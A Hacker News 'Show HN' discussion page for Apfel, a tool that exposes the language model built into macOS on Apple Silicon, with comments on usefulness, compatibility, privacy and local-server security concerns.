Show HN: Apfel – The free AI already on your Mac
franze
660 points
139 comments
April 03, 2026
Github: https://github.com/Arthur-Ficial/apfel
Related Discussions
Found 5 related stories in 65.8ms across 3,471 title embeddings via pgvector HNSW
- Show HN: I built an OS that is pure AI evanbarke · 18 pts · March 28, 2026 · 62% similar
- Show HN: Hyper – A stupidly non-corporate voice AI app for IRL conversations shainvs · 16 pts · March 11, 2026 · 62% similar
- Show HN: Axe – A 12MB binary that replaces your AI framework jrswab · 169 pts · March 12, 2026 · 61% similar
- Launch HN: RunAnywhere (YC W26) – Faster AI Inference on Apple Silicon sanchitmonga22 · 199 pts · March 10, 2026 · 60% similar
- Show HN: Crack – Turn your MacBook into a squeaky door ronreiter · 11 pts · March 22, 2026 · 59% similar
Discussion Highlights (20 comments)
skrun_dev
Notes.app handles big notebooks without choking on storage?
p1anecrazy
Really like demo cli tools description. Are they limited by the context window as well? What’s your experience with log file sizes?
khalic
AFM models are very impressive, but they’re not made for conversation, so keep your expectations down in chat mode.
elcritch
Any know if these only installed on Tahoe? I'm running Sequoia still and get an error about model not found.
swiftcoder
Anyone tried using this as a sub-agent for a more capable model like Claude/Codex?
gigatexal
It’s a very small model but I’ve been playing with it for some time now I’m impressed. Have we been sleeping on Apple’s models? Imagine they baked Qwen 3.5 level stuff into the OS. Wow that’d be cool.
ramon156
Cool tool but I don't get why these websites make idiotic claims > $0 cost No kidding. Why not just link the GH Github: https://github.com/Arthur-Ficial/apfel
brians
I’ve seen several projects like this that offer a network server with access to these Apple models. The danger is when they expose that, even on a loop port, to every other application on your system, including the browser. Random webpages are now shipping with JavaScript that will post to that port. Same-origin restrictions will stop data flow back to the webpage, but that doesn’t stop them from issuing commands to make changes. Some such projects use CORS to allow read back as well. I haven’t read Apfel’s code yet, but I’m registering the experiment before performing it.
Oras
I like the idea and the clarity to explain the usage, my question would be: what kind of tasks it would be useful for?
convexly
I like the approach of running everything locally. I'm strongly of the opinion that the privacy angle for local models is going to keep getting stronger and more relevant. The amount of articles that come out about accidents happening because of people handing too much context to cloud models the more self reinforcing this will become.
arendtio
For those who don't know, 'Apfel' is the German word for Apple.
VanTodi
Just a small thing about the website: your examples shift all the elements below it on mobile when changing, making it jump randomly when trying to read.
gherkinnn
Now this is a development I like. With the Claude bug, or so it is known, burning through tokens at record speed, I gave alternative models a try and they're mostly ... interchangeable. I don't know how easy switching and low brand loyalty and fast markets will play out. I hope that local LLMs will become very viable very soon.
m-s-y
A serious project would do the work to be delivered via the native homebrew repository, not a “selfhosted” one.
nose-wuzzy-pad
Does the local LLM have access to personal information from the Apple account associated with the logged-in user? Maybe through a RAG pipeline or similar? Just curious if there are any risks associated with exposing this in a way that could be exploited via CORS or through another rogue app querying it locally.
phplovesong
This is pretty cool. My bet is that we have more LLMs running locally when its possible, either thru "better hardware as default" or some new tech that can run the models on commodity hardware (like apple silicon / equivalent PC setup).
alwinaugustin
Read Austria as Australia and thought this as an April fool
nottorp
> Starting with macOS 26 (Tahoe), every Apple Silicon Mac includes a language model as part of Apple Intelligence. So you have to put up with the low contrast buggy UI to use that.
mattkevan
As an experiment I built a prototype chatbot app that uses the built-in LLM. It’s got a small context window, but is surprisingly capable and has tool-calling support. Without too much effort I was able to get it to fetch weather data, fetch and summarise emails, read and write reminders and calendar events.
joriskok1
How much storage does it take up?